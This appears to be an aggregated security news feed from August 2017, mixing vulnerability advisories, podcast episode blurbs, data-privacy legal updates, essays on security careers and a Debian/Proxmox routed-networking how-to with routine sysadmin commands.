A vulnerability in the Cisco IOS Software forwarding queue of Cisco 2960X and 3750X switches could allow an unauthenticated, adjacent attacker to cause a memory leak in the software forwarding queue that would eventually lead to a partial denial of service (DoS) condition. More Information: CSCva72252. Known Affected Releases: 15.2(2)E3 15.2(4)E1. Known Fixed Releases: 15.2(2)E6 15.2(4)E3 15.2(5)E1 15.2(5.3.28i)E1 15.2(6.0.49i)E 3.9(1)E.

Enterprise Security Weekly #56 – Tunable Discriminator

Paul and John discuss security policies and procedures. In the news, WatchGuard acquires Datablink, Cylance brings enterprise technology to home users, Oracle and SafeLogic join forces for OpenSSL, 12 security startups that raised new funding in 2017, and more on this episode of Enterprise Security Weekly!Full Show Notes: https://wiki.securityweekly.com/ES_Episode56Visit https://www.securityweekly.com for all the latest episodes!

Nationwide Agrees to Pay $5.5 Million to Settle Multistate Data Breach Investigation

On August 9, 2017, Nationwide Mutual Insurance Co. (“Nationwide”) agreed to a $5.5 million settlement with attorneys general from 32 states in connection with a 2012 data breach that exposed the personal information of over 1.2 million individuals. 

The settlement comes on the heels of a multistate investigation into the circumstances surrounding the breach. In October 2012, Nationwide and its affiliate, Allied Property & Casualty Insurance Co. (“Allied”), suffered a breach that resulted in unauthorized access to, and exfiltration of, certain personal information of their customers and other consumers, including names, Social Security numbers, driver’s license numbers, credit scoring data and other data collected to provide quotes to consumers applying for insurance coverage. Attorneys general from the 32 states alleged that the breach occurred when hackers exploited a vulnerability in a third-party web application hosting software used by Nationwide and Allied. According to the attorneys general, Nationwide and Allied had failed to deploy a critical software patch that was released in 2009 to address the vulnerability.

Under the terms of the settlement, Nationwide and Allied agreed to take a series of steps for a period of three years from the effective date of the agreement, including:

  • appointing an individual responsible for managing and monitoring software and application security updates and patches;
  • maintaining an inventory of all systems that process personal information as well as the updates and patches applied to such systems. Nationwide and Allied also must assign a priority level to each new security update and patch under consideration and document the basis for any exceptions;
  • regularly reviewing and updating incident management policies and procedures;
  • maintaining a system management tool that scans systems that process personal information for “common vulnerabilities or exposures” (“CVEs”) and provides near real-time updates regarding known CVEs;
  • purchasing and installing an “automated CVE feed” from a third-party provider;
  • implementing processes and procedures that provide for internal notification, evaluation and documentation of identified CVEs;
  • performing an internal patch management assessment on a semi-annual basis that identifies known CVEs, assigns them a risk rating, confirms appropriate patches have been applied, and documents the basis for any exceptions; and
  • hiring an independent third party to perform a patch management audit on an annual basis.

The settlement further requires Nationwide and Allied to notify consumers that it retains their personal information, even if they do not become insureds.

D.C. Circuit’s Article III Standing Decision Deepens Appellate Disagreement

On August 1, 2017, a unanimous three-judge panel for the D.C. Circuit reversed the dismissal of a putative data breach class action against health insurer CareFirst, Attias v. CareFirst, Inc., No. 16-7108, slip op. (D.C. Cir. Aug. 1, 2017), finding the risk of future injury was not too speculative to establish injury in fact under Article III. 

The litigation arose from a 2014 data breach involving various types of identifying data. However, the parties disagreed about whether the complaint only alleged the theft of information such as customer names, addresses, and subscriber ID numbers, or whether Social Security numbers and certain payment card information also were exposed. The court found that the complaint did in fact allege the theft of Social Security numbers and payment card information.

Rule 12(b)(1) standing arguments decided on risk of future injury – Declining to decide whether actual fraud had yet occurred, the court nevertheless concluded that the plaintiffs had plausibly alleged a risk of future injury. This future injury was substantial enough to satisfy Article III standing based on, among other things, the data elements actually accessed by hackers on the defendants’ servers, such as Social Security numbers and payment card information. The court’s opinion also identified allegations of “medical identity theft” that was possible with the theft of health insurance subscriber ID numbers alone. According to the court, such allegations “at the very least” created “a plausible allegation that plaintiffs face a substantial risk of identity fraud, even if their [S]ocial [S]ecurity numbers were never exposed.”

Further, and distinguishing the Supreme Court of the United States’ opinion in Clapper v. Amnesty Int’l USA, 568 U.S. 398 (2013), the appellate court found the risk of future harm in the instant case was more substantial because hackers already had accessed customer information and had “both the intent and ability to use that data for ill.” The court also stated that the failure to properly secure customer data, thus subjecting those customers to a substantial risk of identity theft, was “fairly traceable” to the defendants, and that mitigation costs in response to a substantial risk of harm could be redressed with monetary damages.

While the case has been remanded to the district court for further proceedings, it signals that data breach litigants are more likely to weather a standing challenge in specific federal circuits, now including the D.C. Circuit, based solely on allegations of future harm in certain types of data breach cases.

FTC Posts Third Blog in Its “Stick with Security” Series

On August 4, 2017, the FTC published the third blog post in its “Stick with Security” series. As we previously reported, the FTC will publish an entry every Friday for the next few months focusing on each of the 10 principles outlined in its Start with Security Guide for Businesses. This week’s post, entitled “Stick with security: Control access to data sensibly,” details key security measures businesses can take to limit unauthorized access to data in their possession.

The blog post notes that just as business owners lock doors to prevent physical access to business premises and shield company proprietary secrets from unauthorized eyes, they should exercise equal care with respect to access to sensitive customer and employee data.

The post outlines two key security steps companies should take:

  • Restrict Access to Sensitive Data: Employees who don’t use personal information in the course of their employment duties do not need to have access to it. Physical confidential data should be secured in a filing cabinet, locked desk drawer or other secure location. Additionally, a clean desk policy minimizes the risk that data may be accessed by an unauthorized person after hours. Digital confidential information can be secured by providing employees with separate user accounts that limit who can view certain files or databases. For example, a staff member in charge of payroll should have password protected access to a database of employee information.
  • Limit Administrative Access: While it is essential that a system administrator has the ability to change network settings in a business, this privilege should be limited to a select few people. The FTC compares such access to a bank giving the combination to the central vault to only a few people. By requiring different logins for employees and providing each user with the appropriate system privileges, companies can reduce the risk of having too many employees with administrative rights and avoid untrustworthy administrators.

The FTC’s next blog post, to be published Friday, August 11, will focus on secure passwords and authentication.

Privacy and Data Security Risks in M&A Transactions: Video Series

In a video roundtable series, Hunton & Williams LLP partners Lisa J. Sotto and Steven M. Haas and special counsel Allen C. Goolsby, along with Stroz Friedberg’s co-president Eric M. Friedberg and Lee Pacchia of Mimesis Law, discuss the special consideration that should be given to privacy and cybersecurity risks in corporate transactions.

In M&A transactions, it is critical for parties to consider the risks and potential liabilities associated with inadequate privacy and cybersecurity practices—whether arising from regulatory violations, actual data breaches or a host of other issues. Even companies that rely less on personal data for their day-to-day operations need to ensure that their company’s confidential and proprietary information is well guarded long before an M&A transaction arises. Buyers need to assess these risks carefully during due diligence because they can be significant and materially affect a buyer’s valuation of a seller’s business. Moreover, issues that are discovered after an M&A transaction is completed could expose companies to massive liabilities such as expensive consumer class action litigation, intrusive government investigations, hefty remediation costs and other expenses.

Watch the full first segment, The Issue and Why It Matters.

Watch the full second segment, How to Prepare and Best Practices.

Additional segments will be released in the coming weeks.

Hack Naked News #135 – August 8, 2017

Shame on Disney, shooting down customer drones, flaws in solar panels, Chrome extensions spreading adware, and more. Doug White of Roger Williams University joins us to discuss hacking back on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode135Visit https://www.securityweekly.com for all the latest episodes!

MS17-007 – Critical: Cumulative Security Update for Microsoft Edge (4013071) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (August 8, 2017): To comprehensively address CVE-2017-0071, Microsoft released the July security updates for all versions of Windows 10. Note that Windows 10 for 32-bit Systems, Windows 10 for x64-based Systems, Windows 10 Version 1703 for 32-bit Systems, and Windows 10 Version 1703 for x64-based Systems have been added to the Affected Products table as they are also affected by this vulnerability. Microsoft recommends that customers who have not already done so install the July 2017 security updates to be fully protected from this vulnerability.
Summary: This security update resolves vulnerabilities in Microsoft Edge. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Microsoft Edge. An attacker who successfully exploited these vulnerabilities could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Startup Security Weekly #49 – Speak Your Truth

Glenn Chisholm and Ben Johnson of Obsidian Security join us. In the news, how to keep your head without losing your heart, what aspiring founders need to know, supercharging sales, and how NOT to start a startup. Michael and Paul deliver updates from Callsign, Juvo, Awake Security, and more on episode of Startup Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode49Visit https://www.securityweekly.com for all the latest episodes!

UK Government Releases Statement of Intent Regarding Data Protection Bill

On August 7, 2017, the UK Government’s Department for Culture, Media and Sport published a Statement of Intent setting out the planned reforms to be included in the forthcoming Data Protection Bill, which we previously reported is expected to be laid before the UK Parliament in early September.

The EU General Data Protection Regulation (“GDPR”) is set to become law in the UK on May 25, 2018, without the need for national implementing law. With the UK set to leave the EU in March 2019, however, the Statement of Intent clarifies that the GDPR will be transposed into domestic law to prepare for the UK’s post-Brexit relationship with the EU. The Statement of Intent also sets out the proposed derogations from the GDPR which the UK wishes to implement into UK law, such as:

  • reducing the age at which a child can consent to data processing from 16 to 13 years of age;
  • extending the right to process personal data relating to criminal convictions and offences to enable organizations other than those vested with official authority to process it (taking a similar approach to that for the special categories of personal data);
  • creating an exemption from an individual’s right to object to automated decision making where suitable measures are in place to safeguard individuals’ rights; and
  • exempting processing for scientific or historical research organizations, organizations gathering statistics or organizations performing archiving functions in the public interest where compliance would seriously impair their ability to carry out their work.

The Statement of Intent also makes clear the UK Government is “committed to ensuring the uninterrupted data flows” between the UK, the EU and other countries around the world, which will be welcomed by businesses, both UK and international. In a positive move regarding securing the adequacy decision that would preserve uninterrupted data flows, the Statement of Intent also commits the Data Protection Bill to establishing a suitable data protection framework for the processing of personal data for national security.

The Data Protection Bill also will implement the EU’s Data Protection Law Enforcement Directive, which must be implemented in EU Member States by May 6, 2018.

CISOs Moving up in the Corporate Ladder? CIOs Shouldn’t Be Worried


While Chief Information Security Officers (CISOs) are relatively new members of the C-Suite for many organizations, the continued worries about cybersecurity and data breaches have compelled CEOs and boards to reconsider the positioning of the CISO function in the organizational chart.
CISOs - A Rapid Ascent
According to a Forrester study from 2015, 35% of CISOs now report directly to the CEO or president of the organization. This reality is often a little challenging — if not impossible — for CIOs to digest. After all, why is it that someone who used to report to the CIO just a decade ago now gets unfiltered access to the top leadership, and often special budget lines?
A recent blog post characterizes the evolution of the CISO role thusly: “The Guardian and Technologist is giving way to the Business Strategist, the Business Enabler and the Trusted Advisor, who articulates risk, reviews metrics and reports regularly to the board.”
A January 2017 CIO article reported that organizations where the CISO still reports to the CIO had “14% more downtime due to security incidents.” And while the majority of CISOs still report to CIOs, this situation is fluid and evolving rapidly. A K-Logix study reports that when asked about where CISOs will be reporting in the future, “50% of CISOs responded that the role will report into the CEO.”

So, while it may be tempting to consider from a loss perspective, the CISO’s rise isn’t something that CIOs can do much about, at least given the current threat environment. Instead, CIOs can look at this change in the executive landscape as an opportunity to refocus their role, and rally around causes that are relevant to both CISOs and CIOs.
The CISO as a Potential Ally of the CIO
Choose your battles wisely. After all, life isn't measured by how many times you stood up to fight. It's not winning battles that makes you happy, but it's how many times you turned away and chose to look into a better direction. Life is too short to spend it on warring. Fight only the most, most, most important ones, let the rest go. C. JoyBell C.

For decades, a CIO was often the only technology-minded person in the C-Suite. The rise of the CISO means that the CIO has a potential ally within earshot of the CEO or the board. Yet CISOs are not seeking to replace CIOs, and CIOs can no longer look at IT risks as falling purely within “their domain.” The digital risk landscape needs — requires — a functioning relationship among these two giants of the world of data.

CIOs should grab this opportunity to revisit their relationship with the CISO, openly, and seek to patch things up, especially any disagreements from the past which could continue to poison the relationship.
CISO as A Strategic Partner
While a positive working CIO-CISO relationship is definitely a must, the global marketplace and the ever-increasing cybersecurity risks mean that to be truly effective, the CIO-CISO relationship should be that of a strategic partnership: CIOs and CISOs should forge an alliance to focus both on protecting and enabling the organization through smart, effective investments in security and technology.

For example, AI and cloud are changing the way organizations are doing business, leveraging on-demand computing and storage, bringing along cost-savings and increased agility, but also presenting new challenges to keeping track of IT risks, and preparing for the inevitable breach. By working together in a strategic manner, the CIO and CISO can lean on each other to provide, on one hand the IT and data infrastructure that keeps the organization running, and on the other hand, balances cyber risks to within acceptable levels, all the while maintaining a vigilant eye on the network, devices, and data, ready to respond when needed.

The CIO, as an experienced member of the C-Suite can start building this new level of relationship by offering to share their own lessons learned and experiences with joining the top leadership, and share their concerns about the overall digital strategy of the business. For some CIOs, relinquishing control will be more challenging, but one has to pick their battles, and the positioning on the CISO isn’t one worth hanging on to, at least not in the interest of the organization, the greater good.

This post was brought to you by IBM Global Technology Services. For more content like this, visit ITBizAdvisor.com

Paul’s Security Weekly #524 – The Secret Sauce

Danny Miller of Ericom Software joins us, Larry and his intern Galen Alderson exfiltrate data from networks with inexpensive hardware, and we discuss the latest security news!

Full Show Notes: https://wiki.securityweekly.com/Episode524

Visit https://www.securityweekly.com for all the latest episodes!

Eaton ELCSoft Vulnerabilities

NCCIC/ICS-CERT is aware of a public report of buffer overflow vulnerabilities affecting Eaton ELCSoft, a PLC programming software for Eaton Logic Control (ELC) controllers. According to the public report, which was coordinated with ICS-CERT prior to its public release, researcher Ariele Caltabiano (kimiya) working with Trend Micro's Zero Day Initiative, identified that an attacker can leverage these vulnerabilities to execute arbitrary code in the context of the process. ICS-CERT has notified the affected vendor, who has reported that they are planning to address the vulnerabilities. No timeline has been provided. ICS-CERT is issuing this alert to provide notice of the report and to identify baseline mitigations for reducing risks to these and other cybersecurity attacks.

UK Government Expected to Present Data Protection Bill in September 2017

Media sources have reported that the UK Department for Culture, Media & Sport has confirmed its plans to present its Data Protection Bill to Parliament when MPs return to Parliament in early September. The Bill follows commitments made in the Queen’s Speech in June, and will effectively copy the EU General Data Protection Regulation (“GDPR”) into the UK statute book. The Bill’s primary aim is to ensure that the UK retains the same data protection laws as the rest of the EU once it leaves the EU, which is likely to be in March 2019.

No details of the proposed Bill have been publicly disclosed to date, so it remains to be seen whether the Bill will add substance to the areas that the GDPR allows to be decided by national law, and whether it will include further clarity on how sanctions will be applied by the UK Information Commissioner’s Office. This would follow Germany’s lead, after the German Federal Parliament in April of this year passed a new German Data Protection Act that adapted current data protection laws to cover derogations from the GDPR’s provisions.

Howto setup a Debian 9 with Proxmox and containers using as few IPv4 and IPv6 addresses as possible

My current Linux Root-Server needs to be replaced with a newer Linux version and should also be much cheaper then the current one. So at first I did look what I don’t like about the current one:

  • It is expensive with about 70 Euros / months. Following is responsible for that
    • My own HPE hardware with 16GB RAM and a software RAID (hardware raid would be even more expensive) – iLo (or something like it) is a must for me 🙂
    • 16 additional IPv4 addresses for the visualized container and servers
    • Large enough backup space to get back some days.
  • A base OS which makes it hard to run newer Linux versions in the container (sure old ones like CentOS6 still get updates, but that will change)
    • Its time to move to newer Linux versions in the containers
  • OpenVZ based containers which are not mainstream anymore

Then I looked what surrounding conditions changed since I did setup my current server.

  • I’ve IPv6 at home and 70% of my traffic is IPv6 (thx to Google (specially Youtube) and Cloudflare)
  • IPv4 addresses got even more expensive for Root-Servers
  • I’m now using Cloudflare for most of the websites I host.
  • Cloudflare is reachable via IPv4 and IPv6 and can connect back either with IPv4 or IPv6 to my servers
  • With unprivileged containers the need to use KVM for security lessens
  • Hosting providers offer now KVM servers for really cheap, which have dedicated reserved CPUs.
  • KVM servers can host containers without a problem

This lead to the decision to try following setup:

  • A KVM based Server for less than 10 Euro / month at Netcup to try the concept
  • No additional IPv4 addresses, everything should work with only 1 IPv4 and a /64 IPv6 subnet
  • Base OS should be Debian 9 (“Stretch”)
  • For ease of configuration of the containers I will use the current Proxmox with LXC
  • Don’t use my own HTTP reverse proxy, but use exclusively Cloudflare for all websites to translate from IPv4 to IPv6

After that decision was reached I search for Howtos which would allow me to just set it up without doing much research. Sadly that didn’t work out. Sure, there are multiple Howtos which explain you how to setup Debian and Proxmox, but if you get into the nifty parts e.g. using only minimal IP addresses, working around MAC address filters at the hosting providers (which is quite a important security function, BTW) and IPv6, they will tell you: You need more IP addresses, get a really complicated setup or just ignore that point at all.

As you can read that blog post you know that I found a way, so expect a complete documentation on how to setup such a server. I’ll concentrate on the relevant parts to allow you to setup a similar server. Of course I did also some security harding like making a secure ssh setup with only public keys, the right ciphers, …. which I won’t cover here.

Setting up the OS

I used the Debian 9 minimal install, which Netcup provides, and did change the password, hostname, changed the language to English (to be more exact to C) and moved the SSH Port a non standard port. The last one I did not so much for security but for the constant scans on port 22, which flood the logs.

passwd
vim /etc/hosts
vim /etc/hostname
dpkg-reconfigure locales
vim /etc/ssh/sshd_config
/etc/init.d/ssh restart

I followed that with making sure no firewall is active and installed the net-tools so I got netstat and ifconfig.

apt install net-tools

At last I did a check if any packages needs an update.

apt update
apt upgrade

Installing Proxmox

First I checked if the IP address returns the correct hostname, as otherwise the install fails and you need to start from scratch.

hostname --ip-address

Adding the Proxmox Repos to the system and installing the software:

echo "deb http://download.proxmox.com/debian/pve stretch pve-no-subscription" > /etc/apt/sources.list.d/pve-install-repo.list
wget http://download.proxmox.com/debian/proxmox-ve-release-5.x.gpg -O /etc/apt/trusted.gpg.d/proxmox-ve-release-5.x.gpg
apt update && apt dist-upgrade
apt install proxmox-ve postfix open-iscsi

After that I did a reboot and booted the Proxmox kernel, I removed some packages I didn’t need anymore

apt remove os-prober linux-image-amd64 linux-image-4.9.0-3-amd64

Now I did my first login to the admin GUI to https://<hostname>:8006/ and enabled the Proxmox firewall

Than set the firewall rules for protecting the host (I did that for the whole datacenter even if I only have one server at this moment). Ping is allowed, the Webgui and ssh.

I mate sure with

iptables -L -xvn

that the firewall was running.

BTW, if you don’t like the nagging windows at every login that you need a license and if this is only a testing machine as mine is currently, type following:

sed -i.bak 's/NotFound/Active/g' /usr/share/perl5/PVE/API2/Subscription.pm && systemctl restart pveproxy.service

Now we need to configure the network (vmbr0) for our virtual systems and this is the point where my Howto will go an other direction. Normally you’re told to configure the vmbr0 and put the physical interface into the bridge. This bridging mode is the easiest normally, but won’t work here.

Routing instead of bridging

Normally you are told that if you use public IPv4 and IPv6 addresses in containers you should bridge it. Yes thats true, but there is one problem. LXC containers have their own MAC addresses. So if they send traffic via the bridge to the datacenter switch, the switch sees the virtual MAC address. In a internal company network on a physical host that is normally not a problem. In a datacenter where different people rent their servers thats not good security practice. Most hosting providers will filter the MAC addresses on the switch (sometimes additional IPv4 addresses come with the right to use additional MAC addresses, but we want to save money here 🙂 ). As this server is a KVM guest OS the filtering is most likely part of the virtual switch (e.g. for VMware ESX this is the default even).

With ebtables it is possible to configure a SNAT for the MAC addresses, but that will get really complicated really fast – trust me with networking stuff – when I say complicated it is really complicated fast. 🙂

So, if we can’t use bridging we need to use routing. Yes the routing setup on the server is not so easy, but it is clean and easy to understand.

First we configure the physical interface in the admin GUI

Two configurations are different than at normal setups. The provider gave you most likely a /23 or /24, but I use a subnet mask /32 (255.255.255.255), as I only want to talk to the default gateway and not the other servers from other customers. If the switch thinks traffic is ok, he can reroute it for me. The provider switch will defend its IP address against ARP spoofing, I’m quite sure as otherwise a incorrect configuration of a customer will break the network for all customer – the provider will make that mistake only once. For IPv6 we do basically the same with /128 but in this case we also want to reuse the /64 subnet on our second interface.

As I don’t have additional IPv4 addresses, I’ll use a local subnet to provide access to IPv4 addresses to the containers (via NAT), the IPv6 address gets configured a second time with the /64 subnet mask. This setup allows use to route with only one /64 – we’re cheap … no extra money needed.

Now we reboot the server so that the /etc/network/interfaces config gets written. We need to add some additional settings there, so it looks like this

The first command in the red frame is needed to make sure that traffic from the containers pass the second rule. Its some kind lxc specialty. The second command is just a simple SNAT to your public IPv4 address. The last 2 are for making sure that the iptable rules get deleted if you stop the network.

Now we need to make sure that the container traffic gets routed so we put following lines into /etc/sysctl.conf

And we should also enable following lines

Now we’re almost done. One point remains. The switch/router which is our default gateway needs to be able to send packets to our containers. For this he does for IPv6 something similar to an ARP request. It is called neighbor discovery and as the network of the container is routed we need to answer the request on the host system.

Neighbor Discovery Protocol (NDP) Proxy

We could now do this by using proxy_ndp, the IPv6 variant of proxy_arp. First enable proxy_ndp by running:

sysctl -w net.ipv6.conf.all.proxy_ndp=1

You can enable this permanently by adding the following line to /etc/sysctl.conf:

net.ipv6.conf.all.proxy_ndp = 1

Then run:

ip -6 neigh add proxy 2a03:5000:3d:1ee::100 dev ens3

This means for the host Linux system to generate Neighbor Advertisement messages in response to Neighbor Solicitation messages for 2a03:5000:3d:1ee::100 (e.g. our container with ID 100) that enters through ens3.

While proxy_arp could be used to proxy a whole subnet, this appears not to be the case with proxy_ndp. To protect the memory of upstream routers, you can only proxy defined addresses. That’s not a simple solution, if we need to add an entry for every container. But we’re saved from that as Debian 9 ships with an daemon that can proxy a whole subnet, ndppd. Let’s install and configure it:

apt install ndppd
cp /usr/share/doc/ndppd/ndppd.conf-dist /etc/ndppd.conf

and write a config like this

route-ttl 30000
proxy ens3 {
router no
timeout 500
ttl 30000
rule 2a03:5000:3d:1ee::/64 {
auto
}
}

now enable it by default and start it

update-rc.d ndppd defaults
/etc/init.d/ndppd start

Now it is time to boot the system and create you first container.

Container setup

The container setup is easy, you just need to use the Proxmox host as default gateway.

As you see the setup is quite cool and it allows you to create containers without thinking about it. A similar setup is also possible with IPv4 addresses. As I don’t need it I’ll just quickly describe it here.

Short info for doing the same for an additional IPv4 subnet

Following needs to be added to the /etc/network/interfaces:

iface ens3 inet static
pointopoint 186.143.121.1

iface vmbr0 inet static
address 186.143.121.230 # Our Host will be the Gateway for all container
netmask 255.255.255.255
# Add all single IP's from your /29 subnet
up route add -host 186.143.34.56 dev br0
up route add -host 186.143.34.57 dev br0
up route add -host 186.143.34.58 dev br0
up route add -host 186.143.34.59 dev br0
up route add -host 186.143.34.60 dev br0
up route add -host 186.143.34.61 dev br0
up route add -host 186.143.34.62 dev br0
up route add -host 186.143.34.63 dev br0
.......

We’re reusing the ens3 IP address. Normally we would add our additional IPv4 network e.g. a /29. The problem with this straight forward setup would be that we would lose 2 IP addresses (netbase and broadcast). Also the pointopoint directive is important and tells our host to send all requests to the datacenter IPv4 gateway – even if we want to talk to our neighbors later.

The for the container setup you just need to replace the IPv4 config with following

auto eth0
iface eth0 inet static
address 186.143.34.56 # Any IP of our /29 subnet
netmask 255.255.255.255
gateway 186.143.121.13 # Our Host machine will do the job!
pointopoint 186.143.121.1

How that saved you some time setting up you own system!

Hack Naked News #134 – August 2, 2017

No more VPNs in Russia, hacking luxury cars, stolen Game of Thrones scripts, your Echo is spying on you, and more. Jason Wood of Paladin Security joins us to discuss Chrome plugin phishing attacks on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode134Visit https://www.securityweekly.com for all the latest episodes!

FTC Approves Modifications to TRUSTe’s COPPA Safe Harbor Program

On July 31, 2017, the Federal Trade Commission announced that it has approved modifications to TRUSTe’s safe harbor program under the Children’s Online Privacy Protection Rule (the “COPPA Rule”).

The COPPA Rule incorporates a “safe harbor” provision that allows companies and industry groups to seek the FTC’s approval for self-regulatory frameworks that implement “the same or greater protections for children” as those set forth in the COPPA Rule. If a company participates in a self-regulatory framework, it will largely be subject to the enforcement procedures in the safe harbor instead of the FTC investigation and enforcement procedures.

As we previously reported, TRUSTe proposed to modify its safe harbor program to require participants to conduct an annual internal assessment of third parties’ collection of personal information from children on their websites or online services.

The FTC received a handful of comments on TRUSTe’s proposed changes from industry groups and concerned citizens, and ultimately voted 2-0 to approve the modifications to TRUSTe’s safe harbor program.

FTC Posts Second Blog in Its “Stick with Security” Series

On July 28, 2017, the FTC published the second blog post in its “Stick with Security” series. As we previously reported, the FTC will publish an entry every Friday for the next few months focusing on each of the 10 principles outlined in its Start with Security Guide for Businesses. This week’s post, entitled “Start with security – and stick with it,” looks at key security principles that apply to all businesses regardless of their size or the types of data they handle.

The practical guidance offers five steps companies can take to ensure the security of the data they hold and provides examples to illustrate each step.

  • Don’t collect personal information you don’t need – The less confidential information a company holds, the less risk a company faces in the event of a breach. According to the FTC, the old practice of stockpiling sensitive information when it isn’t required doesn’t hold water in the cyber era. Businesses should limit what data they collect to reduce security risks and streamline compliance procedures.
  • Hold onto information only as long as you have a legitimate business need – Companies should regularly review the data they hold, assess which data should be maintained and carefully dispose of data that is no longer required to achieve a legitimate business need.
  • Don’t use personal information when it is not necessary – Sensitive data should not be used in contexts that create unnecessary risks. For example, a company that wishes to set up an app for its sellers to access customer accounts should not provide actual account files of customers to explain the scope of the project to an app developer.
  • Train your staff on your standards – And make sure they are following through. According to the FTC’s post, a company’s staff poses the greatest risk to the security of sensitive information in a company’s possession. At the same time, company staff also provide the number one defense against unauthorized access. Companies should train all staff, including temporary and seasonal workers, on standards to be upheld. Appropriate procedures to monitor staff compliance should be put in place as well. Additional training should be provided to existing staff to reinforce company rules, and companies should encourage employees to suggest ways of improving procedures.
  • When feasible, offer consumers more secure choices – Companies should analyze their data collection practices for both business operations and products and services they offer to consumers. Products should be designed to collect sensitive information only if necessary for product functionality. Default settings and user set up interfaces should be designed in a way that make it easy for consumers to choose more secure settings and defaults should be set at more protective levels.

The FTC’s next blog post, to be published this Friday, August 4, will focus on sensibly controlling access to data.

On Titles, Jobs, and Job Descriptions (Not All Roles Are Architects) – The Falcon’s View

Folks: Please stop calling every soup-to-nuts, everything-but-the-kitchen-sink security job a "security architect" role. It's harmful to the industry and it's doing you no favors trying to find the right resources. In fact, please stop posting these "one role does everything security under the sun" positions altogether. It's hurting your recruitment efforts, and it makes it incredibly difficult to find positions that are a good fit. Let me explain...

For starters, there are generally three classes of security people, management and pentesters aside:
- Analysts
- Engineers
- Architects

(Note that these terms tend to be loaded due to their use in other industries. In fact, in some states you might even have to come up with a different equivalent term for positions due to legal definitions (or licensing) of roles. Try to bear with me and just go with the flow, eh?)

Analysts are people who think about stuff and write about stuff and sometimes help initiate actions, but they are not the implementers of security tools or practices. An analyst may or may not be particularly technical, depending on the nature of the role. For example, there are tons of entry-level SOC analyst positions today that can provide a first taste of infosec work life. You rarely need to have a lot of technical skills, at least initially, to land one of these gigs (this varies by org). Similarly, there are GRC analyst roles that tend not to be technical at all (despite often including "technical writing," such as for policies, in the workload). On the far end of the spectrum, you may have incident response (IR) analysts who are very technical, but again note the nature of their duties: thinking about stuff, writing about stuff, and maybe initiating actions (such as the IR process or escalations therein).

Engineers are people who do most of the hands-on work. If you're looking for someone to do a bunch of implementation work, particularly around security tools and tech, then you want a security engineer, and that should be clearly stated in your job description. Engineers tend to be people who really enjoy implementation and maintenance work. They like rolling up their sleeves and getting their hands dirty. You might also see "administrator" used in this same category (though that's muddy water as sometimes a "security administrator" might be more like an analyst in being less technical, skilled in one kind of tool, like adding and removing users to Active Directory or your IAM of choice). In general, if you're listing a position that has implementation responsibilities, then you need to be calling it an engineer role (or equivalent), not an analyst and certainly not an architect.

Architects are not your implementers. And, while they are thinkers who may do a fair amount of technical writing, the key differentiators here are that 1) they tend to be way more technical than the average analyst, 2) they see a much bigger picture than the average analyst or engineer, and 3) they've often risen to this position through one or both of the other roles, but almost certainly with considerable previous hands-on implementation experience as an engineer. It's very important to understand that your architects, while likely having a background in engineering, is unlikely to want to do much hands-on implementation work. What hands-on work they are willing/interested to do is likely focused heavily on proofs of concept (POCs) and testing new ideas and technologies. Given their technical backgrounds, they'll be able to go toe-to-toe on technical topics with just about anyone in the organization, even though they may not be able to sit down and crank out a bunch of server builds in short order any more (or, maybe they can!). A good security architect provides experiential, context-relevant guidance on how to design /secure/ systems and applications, as well as providing guidance on technology purchasing decisions, technical designs, etc. Where they differ from, say, GRC/policy analysts is that when they provide a recommendation on something, they can typically back it up with more than a flaccid reference to "best practices" or some other lame appeal to authority; they can instead point to proven experiences and technical rationale.

Going all the way back to before my Gartner days, I've long told SMBs that their first step should not be hiring a security manager, but rather a security architect who reports up through the IT food chain, preferably directly to the IT manager/director or CIO (depending on size and structure of the org). The reason for this recommendation is that small IT shops already have a number of engineers/administrators and analysts, but what they oftentimes lack is someone with broad AND deep technical expertise in security who can provide all sorts of guidance and value to the organization. Part and parcel to this is that SMBs especially do not need to build out a "security team" or "security department"! (In fact, I often argue only the largest enterprises should ever go this route, and only to improve efficiency and effectiveness. Status quo and conventional wisdom be damned.) Most small IT shops just need someone to help out with decisions and evaluations to ensure that the organization is making smart security decisions. This security architect role should not be focused on implementation or administration, but instead should be serving in an almost quasi-EA (enterprise architect) role that cuts across the entire org. In many ways, a security architect in a counselor who works with teams to improve their security decisions. It's common in larger organizations for security architects to have a focus on one part of the business simply as a matter of scale and supportability.

So that's it. Nothing too crazy, right? But, I think it's important. Yes, some of you may debate and question how I've defined things, and that's fine, but the main takeaway here, hopefully, is that job descriptions need to be reset again around some standard language. In particular, orgs need to stop listing a ton of implementation work for "security architect" roles because that's misleading and really not what a security architect does. Properly titling and describing roles is very important, and will help you more readily find your ideal candidates. Calling everything a "security architect" does not do anything positive for you, and it serves to frustrate and disenfranchise your candidate pools (not to mention wasting your time on screening).

fwiw. ymmv. cheers!

DerbyCon 7 Live Stream

If you weren't fortunate to get a ticket to DerbyCon this year, the conference will once again be live streaming talks. More information will be available closer to the conference at www.derbycon.com.

But did you know every talk (almost) is also available for viewing after the conference is over? You can find past Derbycon presentations here as well as dozens of other conferences, or on IronGeek's YouTube channel here. Not as interesting or as much fun as being there, but if you're looking for good presentations to learn pen testing or blue teaming tactics, it's a great resource.

A security minded guy forced to buy a Wifi enabled cleaning robot

First I want to tell you all that I wanted a vacuum cleaning robot without Internet connection, but I couldn’t find one which fulfilled the requirements. At first I thought the DEEBOT M81 from ECOVACS would be such a device (vacuum and mop combo and possible to carry between rooms as it works randomly), but don’t buy it if you’ve stairs. On the first day alone at home it went 2 floors down, somehow it did look okay and still worked after the kamikaze. We just needed to search for it through the whole house. After that I did some tests, I found out that it stops 6 times at the stairs and falls down the 7 or 8 time. Searching through the Internet showed me that I’m not the only one. The second problem was that configuring the timer differently for some days (like not cleaning on weekends) was not possible. After loosing my last chance for a non Internet connected device I went for the DEEBOT M81 Pro which needs an Android or IPhone app and WiFi, if you want to configure the timer for not cleaning on weekends. This is my story about that – I guess – a typical IoT device.

 

The App – ECOVACS
After unpacking and charging of the robot, I went and installed the App on my test mobile. Why not on my real mobile? Take a look at the required permissions:

I though that is just an App to control my vacuum robot …. guess not. Anyway I installed it on my test system and created a dummy user. Of course I took a look at the traffic. First it connects to ecosphere-app.ecovacs-japan.com,

